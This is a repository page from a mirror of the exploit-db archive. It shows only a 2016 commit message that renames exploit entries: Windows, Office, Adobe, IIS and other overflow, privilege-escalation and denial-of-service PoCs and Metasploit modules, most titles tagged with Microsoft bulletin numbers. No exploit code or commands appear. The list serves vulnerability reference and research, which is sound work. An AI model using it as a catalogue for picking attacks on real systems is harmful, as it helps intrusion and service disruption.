bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/40779.py
Offensive Security 8948e76c12 DB: 2016-11-19 
14 new exploits

Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)

Microsoft Windows - 'Jolt2.c' Denial of Service
Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029)

Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service
Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)

Ventrilo 2.3.0 - Remote Denial of Service (All Platforms)
Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service

Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)
Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)

Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)
Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)

Microsoft Windows Vista - Access Violation from Limited Account Exploit (BSoD)
Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)

Microsoft Windows 2003 - '.EOT' BSOD Crash
Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash

Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)

Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit)
Microsoft Windows 2000<2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)

Google Chrome 4.1 - OOB Array Indexing
Google Chrome 4.1 - Out-of-Bounds Array Indexing

Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)
Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)

CommView 6.1 (Build 636) - Local Denial of Service (BSOD)
CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)

Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)
Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)

Microsoft Cinepak Codec CVDecompress - Heap Overflow
Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)

Microsoft Unicode Scripts Processor - Remote Code Execution
Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)

Microsoft Office - HtmlDlgHelper Class Memory Corruption
Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)

Microsoft Plug and Play Service - Overflow Exploit (Metasploit)
Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)

Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC)
Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)

Microsoft HyperV - Persistent Denial of Service
Microsoft HyperV - Persistent Denial of Service (MS11-047)

Crush FTP 5 - 'APPE' command Remote JVM BSOD (PoC)
Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC)
Microsoft WINS Service 5.2.3790.4520 - Memory Corruption
Microsoft WINS - ECommEndDlg Input Validation Error
Microsoft WINS Service 5.2.3790.4520 - Memory Corruption (MS11-035)
Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)

Win32k - Null Pointer De-reference PoC (MS11-077)
Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)

Winows 7 keylayout - Blue Screen
Microsoft Winows 7 - Keyoard Layout Blue Screen of Death (MS10-073)

Apple Safari - GdiDrawStream BSoD
Apple Safari - GdiDrawStream Blue Screen of Death

PeerBlock 1.1 - BSOD Exploit
PeerBlock 1.1 - Blue Screen of Death Exploit

.NET Framework EncoderParameter - Integer Overflow
Microsoft .NET Framework EncoderParameter - Integer Overflow (MS12-025)

Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034)
Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)

Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass
Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)

Microsoft Windows Media Services 4.0/4.1 - Denial of Service
Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)

Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)
Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2)

Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service
Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)

Microsoft IIS 4.0/5.0 - FTP Denial of Service
Microsoft IIS 4.0/5.0 - FTP Denial of Service (MS01-026)

Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service
Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)

Microsoft Windows XP/2000 - showHelp CHM File Execution
Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)

Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service
Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)

Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities
Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)

DirectShow - Arbitrary Memory Overwrite (MS13-056)
Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)

Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1)
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)

Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow
Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)

Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads
Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021)

Google Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow
Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow

Avast! - OOB Write Decrypting PEncrypt Packed executables
Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables

Microsoft Office - COM Object DLL Planting with 'WMALFXGFXDSP.dll' (MS16-007)
Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)

Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Microsoft Edge - 'Array.splice' Heap Overflow
Moxa SoftCMS 1.5 - Denial of Service (PoC)
Microsoft Edge - 'FillFromPrototypes' Type Confusion
Microsoft Edge - 'Array.filter' Info Leak
Microsoft Edge - 'Array.reverse' Overflow
Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow
Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)
Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)
Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)
Microsoft Windows 2000 - Utility Manager All-in-One Exploit (MS04-019)
Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - Universal Language Utility Manager Exploit (MS04-019)
Microsoft Windows Server 2000/XP - Task Scheduler .job Exploit (MS04-022)
Microsoft Windows Server 2000 - Utility Manager All-in-One Exploit (MS04-019)

Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)
Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)

Microsoft Windows 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)
Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)

Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)
Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)

Microsoft Excel - 0x5D record Stack Overflow
Microsoft Excel - 0x5D record Stack Overflow (MS10-038)

Win32k - Keyboard Layout (MS10-073)
Microsoft Win32k - Keyboard Layout (MS10-073)
Adobe - Doc.media.newPlayer Use-After-Free (1)
Adobe - 'util.printf()' Buffer Overflow (1)
Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)
Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)

Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)
Adobe - JBIG2Decode Memory Corruption (1)
Adobe - Collab.getIcon() Buffer Overflow (1)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (Metasploit)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (1)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2)
Media Jukebox 8.0.400 - Buffer Overflow (SEH)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (2)
Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (2)
Adobe - Doc.media.newPlayer Use-After-Free (2)
Adobe - 'util.printf()' Buffer Overflow (2)
Microsoft Excel - Malformed FEATHEADER Record (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)
Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (2)
Adobe - 'util.printf()' Buffer Overflow (Metasploit) (2)
Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)

WM Downloader 3.1.2.2 - Buffer Overflow (2)
WM Downloader 3.1.2.2 - Buffer Overflow (Metasploit) (2)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (2)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)

Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)

Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (Metasploit)
Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)
gAlan 0.2.1 - Buffer Overflow (2)
Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (Metasploit)
gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)
Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)

BACnet OPC Client - Buffer Overflow (2)
BACnet OPC Client - Buffer Overflow (Metasploit) (2)

Adobe - JBIG2Decode Memory Corruption (2)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)

Mini-stream 3.0.1.1 - Buffer Overflow (2)
Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)
Adobe - Collab.getIcon() Buffer Overflow (2)
Adobe PDF - Escape EXE Social Engineering (No JavaScript)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (4)
Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)
Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)
Microsoft Word - RTF pFragments Stack Buffer Overflow (File Format)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)

Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)
Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1)

Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit)
Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit)

Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016)
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)

Microsoft Excel 2007 SP2 - Buffer Overwrite
Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)

Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3)
Mini-stream Ripper 3.0.1.1 - Buffer Overflow (Metasploit) (3)

Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021)
Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021) (Metasploit)

Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038)
Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)

Microsoft Office 2003 Home/Pro - Code Execution
Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)

Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)
Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)

Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit)
Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)

Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request
Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003)

Microsoft Windows Kernel - Intel x64 SYSRET (PoC)
Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)

Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080)
Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)

Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101)
Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)

Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation
Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)

Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation
Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)

Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)
Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)

VMware - Setuid VMware-mount Unsafe popen(3)
VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)

Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (Metasploit)
Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)

Microsoft Word - RTF Object Confusion (MS14-017)
Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)

Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)
.NET Deployment Service - IE Sandbox Escape (MS14-009)
Registry Symlink - IE Sandbox Escape (MS13-097)
Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)
Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)

Microsoft Windows - OLE Package Manager Code Execution (MS14-060)
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)

Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (Metasploit)
Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution Through Python (MS14-064)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064)
Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)

Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)
Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)

Microsoft Windows Server 2003 SP2 - Privilege Escalation
Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)

Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation
Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)

Publish-It - '.PUI' Buffer Overflow (SEH)
Publish-It - '.PUI' Buffer Overflow (SEH) (Metasploit)

Microsoft Windows - ClientCopyImage Win32k Exploit (Metasploit)
Microsoft Windows - ClientCopyImage Win32k Exploit (MS15-051) (Metasploit)

Microsoft Word - Local Machine Zone Remote Code Execution
Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)

VideoCharge Studio - Buffer Overflow (SEH)
VideoCharge Studio - Buffer Overflow (SEH) (Metasploit)

Microsoft Windows - NtUserGetClipboardAccessToken Token Leak
Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)

Microsoft Windows - Font Driver Buffer Overflow (MS15-078)
Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)

Nagios 4.2.2 - Privilege Escalation

ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)
ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation

Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)

VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)
VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation
Palo Alto Networks PanOS root_trace - Privilege Escalation
Palo Alto Networks PanOS root_reboot - Privilege Escalation

RealServer < 8.0.2 - Remote Exploit (Windows Platforms)
RealServer < 8.0.2 (Windows Platforms) - Remote Exploit

Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)
Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)

Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)
Microsoft Windows Server 2000/XP - Workstation Service Overflow (MS03-049)

Microsoft Windows 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)
Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)

Microsoft Windows - 'WINS' Remote Buffer Overflow (3)
Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)

Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)
Microsoft Windows Message Queuing - Buffer Overflow Universal Exploit (MS05-017) (v.0.3)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)
eIQnetworks License Manager - Remote Buffer Overflow (1) (Metasploit)
eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)

Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)

Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)

Microsoft Windows - NetpManageIPCConnect - Stack Overflow (Python)
Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)
Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow
Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow
Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)
Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)

CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)

Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)

Microsoft Windows Message Queuing Service - RPC Buffer Overflow
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)

Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC)
Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)

Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly
Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)

Movie Maker - Remote Code Execution (MS10-016)
Microsoft Movie Maker - Remote Code Execution (MS10-016)

ASP.NET - Padding Oracle (MS10-070)
Microsoft ASP.NET - Padding Oracle (MS10-070)
ASP.NET - Padding Oracle File Download (MS10-070)
Microsoft Windows - NTLM Weak Nonce
Microsoft ASP.NET - Padding Oracle File Download (MS10-070)
Microsoft Windows - NTLM Weak Nonce (MS10-012)

ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)
Microsoft ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)

Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)
PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)
PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit)

Axis2 - Authenticated Code Execution (via REST)
Axis2 - Authenticated Code Execution (via REST) (Metasploit)

Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)
Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) (Metasploit)
Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (Metasploit)
Microsoft Private Communications Transport - Overflow Exploit (Metasploit)
Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)
Microsoft Private Communications Transport - Overflow Exploit (MS04-011) (Metasploit)
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (Metasploit)
Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (Metasploit)
Microsoft IIS - Phone Book Service Overflow (Metasploit)
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)
Microsoft IIS - Phone Book Service Overflow (MS00-094) (Metasploit)
Microsoft WINS - Service Memory Overwrite (Metasploit)
Microsoft Windows - SMB Relay Code Execution (Metasploit)
Microsoft Windows - Print Spooler Service Impersonation (MS10-061)
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (Metasploit)
Microsoft RRAS Service - Overflow Exploit (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (Metasploit)
Microsoft Server Service - NetpwPathCanonicalize Overflow (Metasploit)
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (Metasploit)
Microsoft Services - 'nwwks.dll' (MS06-066)
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)
Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
Microsoft RRAS Service - Overflow Exploit (MS06-025) (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit)
Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)
Microsoft NetDDE Service - Overflow Exploit (Metasploit)
Microsoft Workstation Service - NetpManageIPCConnect Overflow (Metasploit)
Microsoft Services - 'nwapi32.dll' (MS06-066)
Microsoft NetDDE Service - Overflow Exploit (MS04-031) (Metasploit)
Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)
Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)

Microsoft RRAS Service - RASMAN Registry Overflow (Metasploit)
Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (Metasploit)
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (Metasploit)
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)

Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (Metasploit)
Microsoft SQL Server - Resolution Overflow (Metasploit)
Microsoft SQL Server - Payload Execution (via SQL Injection)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)
Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)

Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (via SQL Injection)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)

Microsoft SQL Server - Hello Overflow (Metasploit)
Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (2)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (2)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (3)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (3)

CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)

IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)
IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (1)

HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)
HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)

Microsoft DirectX DirectShow - SAMI Buffer Overflow (Metasploit)
Microsoft DirectX DirectShow - SAMI Buffer Overflow (MS07-064) (Metasploit)

HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)
HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (Metasploit)
Microsoft IIS 4.0 - '.htr' Path Overflow (Metasploit)
Microsoft IIS 5.0 - Printer Host Header Overflow (Metasploit)
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (Metasploit)
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)
Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)
Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)

Microsoft IIS 5.0 - IDQ Path Overflow (Metasploit)
Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)

Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (1)
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (Metasploit)
Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (Metasploit)
